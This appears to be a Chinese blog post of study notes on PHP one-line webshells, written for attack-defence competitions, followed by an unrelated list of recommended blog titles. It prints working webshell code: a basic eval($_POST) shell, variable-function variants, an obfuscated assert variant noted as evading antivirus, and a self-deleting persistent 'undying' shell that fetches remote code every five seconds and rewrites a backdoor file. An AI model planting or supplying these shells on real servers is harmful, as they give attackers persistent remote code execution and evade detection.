木马学习笔记 1【一句话木马篇】
注意注意:本博客仅供学习交流使用,不可用于任何违法行为中,学信息安全,保卫我国信息安全,爱我中国~
ummmm,之前队内交流提到了线下赛的木马,和表哥们的交流中也认识到很多不足,一边学习,一边进步吧,欢迎大佬留言指点~
下面从一些基本种类的一句话木马开始讲起【PHP环境】,主要讲述一句话木马绕过及不死鸟木马的原理
1.最最最最基础一句话
eval($_POST["test"]);
很多人都知道这个很轻松菜刀直连,这里还是简单截个图说明下
说明下,上面左边是你放有这句木马的php文件,右边是俗称的密码,其实稍微懂点php的人都应该很容易能理解这句木马的原理,eval执行函数内的可执行代码,而内部代码是post获取的,所以,ummmm
2.绕过第一种姿势
$_GET[a]($_GET[b]);
这里不补充详细代码了,提供一个思路,利用assert,eval执行代码,生成一个上面的最基本一句话木马,只要这个代码还在,我就可以随时随地生成我想要的木马文件
3.不死鸟
unlink($_SERVER['SCRIPT_FILENAME']);
ignore_user_abort(true);
set_time_limit(0);
$remote_file = 'url';while($code = file_get_contents($remote_file)){
file_put_contents('./1.php',$code);
sleep(5);
};
不死鸟的核心是开头三句话,含义是删除自己本身文件,自身永驻内存,并且没有执行次数限制,
中间的代码很简单,读取你储存在某个地方的一句话木马,在目标服务器中产生,配合上sleep(5),效果就是,没五秒产生一个一句话木马(删除继续产生,俗称的不死鸟)
对付这种木马,目前最有效的办法就是重启PHP服务器
4.绕过姿势2
#($_=@$_GET[qswfei]).@$_($_POST[dsafsdfe])#?qswfei=assert
#连接密码:dsafsdfe
#d盾报病毒
如上所示,D盾报毒,ummm,比赛面前用用吧,实际中估计已经废了
5.其他杂碎知识
#include ($filename);
//危险的include函数,直接编译任何文件为php格式运行#echo str_rot13('riny'); eval#$_POST['sa']($_POST['sb']);#fopen("testfile.txt", "w")#限制别人连接,md5验证下,pass=wsrW12R#@WEuy9()
#$_POST['pass'])==' d0ae51216453365ad68537ae5da38fc4'
知识所限,暂时总结这么多,总的还是,把各种各样的知识结合到一起,多看看PHP一些冷门函数,混合搭配起来,就是一个很优秀的一句话木马了
另:欢迎大佬留下博客地址或者一些建议一起交流,为大佬端茶!
木马学习笔记 1【一句话木马篇】相关推荐
- VULKAN学习笔记-inter教学四篇
VULKAN学习笔记-inter教学四篇 --交换链相关函数:实例层 vkCreateWin32SurfaceKHR vkDestroySurfaceKHR vkGetPhysicalDeviceSu ...
- COBOL 学习笔记 之 入門篇(续集)
书接上一回(COBOL 学习笔记 之 入門篇 ) 从程序可以看到,COBOL程序分为四部分: IDENTIFICATION DIVISION. ENVIRONMENT DIVISION. D ...
- 菜鸟学习笔记:Java提升篇12(Java动态性2——动态编译、javassist字节码操作)
菜鸟学习笔记:Java提升篇12(Java动态性2--动态编译.javassist字节码操作) Java的动态编译 通过脚本引擎执行代码 Java字节码操作 JAVAssist的简单使用 常用API ...
- 菜鸟学习笔记:Java提升篇11(Java动态性1——注解与反射)
Java提升篇11(Java其它高级特性--注解与反射) 注解(Annotation) JDK内置注解 自定义注解 元注解(meta-annotation) 反射(reflection) 动态语言 反 ...
- 菜鸟学习笔记:Java提升篇10(网络2——UDP编程、TCPSocket通信、聊天室案例)
菜鸟学习笔记:Java提升篇10(网络2--UDP编程.TCPSocket通信) UDP编程 TCP编程(Socket通信) 单个客户端的连接 多个客户端的连接(聊天室案例) UDP编程 在上一篇中讲 ...
- 菜鸟学习笔记:Java提升篇9(网络1——网络基础、Java网络编程)
菜鸟学习笔记:Java提升篇9(网络1--网络基础.Java网络编程) 网络基础 什么是计算机网络 OS七层模型 Java网络编程 InetAddress InetSocketAddress URL类 ...
- 菜鸟学习笔记:Java提升篇8(线程2——线程的基本信息、线程安全、死锁、生产者消费者模式、任务调度)
菜鸟学习笔记:Java提升篇8(线程2--线程的基本信息.线程安全.死锁.生产者消费者模式.任务调度) 线程的基本信息 线程同步 线程安全 死锁 生产者消费者模式 任务调度(了解) 线程的基本信息 J ...
- 菜鸟学习笔记:Java提升篇6(IO流2——数据类型处理流、打印流、随机流)
菜鸟学习笔记:Java IO流2--其他流 字节数组输入输出流 数据类型处理流 基本数据类型 引用类型 打印流 System.in.System.out.System.err 随机流RandomAcc ...
- 菜鸟学习笔记:Java提升篇5(IO流1——IO流的概念、字节流、字符流、缓冲流、转换流)
菜鸟学习笔记:Java IO流1--IO流的概念.字节流.字符流.缓冲流.转换流 IO流的原理及概念 节点流 字节流 文件读取 文件写出 文件拷贝 文件夹拷贝 字符流 文件读取 文件写出 处理流 缓冲 ...
- 菜鸟学习笔记:Java提升篇4(容器4——Collections工具类、其他容器)
菜鸟学习笔记:Java容器4--Collections工具类.其他容器 Collections工具类 容器其他知识点 队列Queue Enumeration接口 Hashtable Propertie ...
最新文章
- getComputedStyle currentStyle 获取当前元素所有最终使用的CSS属性值
- 解字符串不能超过8000的方法及交叉表的处理
- SAP CRM 产品主数据搜索时的权限检查实现 - Product search authorization check
- K-periodic Garland CodeForces - 1353E(暴力+贪心+dp)
- Linux--date命令 date命令
- 360浏览器怎么关闭全屏看大图提示条
- video标签 api
- 关于Dijkstra三种堆速度的研究
- Java字符串equals()
- 第三篇 层次类非线性表的编程实验 第9章 应用二叉树的基本概念编程
- SetWindowLong代码设置窗体borderStyle风格 TOOLWINDOW
- 关于LeNet-5卷积神经网络 S2层与C3层连接的参数计算的思考???
- 数字信号处理实验三 FIR数字滤波器设计与软件实现
- Linux安装Java8
- 写一个自动阅读的方法(需要运用html和css和JavaScript)
- IOI国家集训队1999-2020年论文集(附网盘免费下载链接)
- 深度学习-对抗神经网络简介
- Oracle 临时表详解(temporary table)
- expandable长点击的实现
- ArrayList打印出来为什么会有空格
热门文章
- 自动控制原理快速入门+理解
- 3行python代码翻译70种语言,这个OCR神奇太赞了
- 【世界数学难题】素数判定与大数因子分解问题(上)
- 【19调剂】河南理工大学 调剂公告
- s905中文版linux,S905/S905M安装LAKKA教程
- Excel 生成Code128条码
- springmvc下载文件以及下载大文件方法
- 论文解读:CLNN-loop:预测不同细胞系和CTCF结合位点 (CBS) 对类型中CTCF介导的染色质环的深度学习模型
- 答疑|PLC程序可以申请软件著作权登记么?
- ios13全选手势_iOS13这六个实用小功能 你知道吗?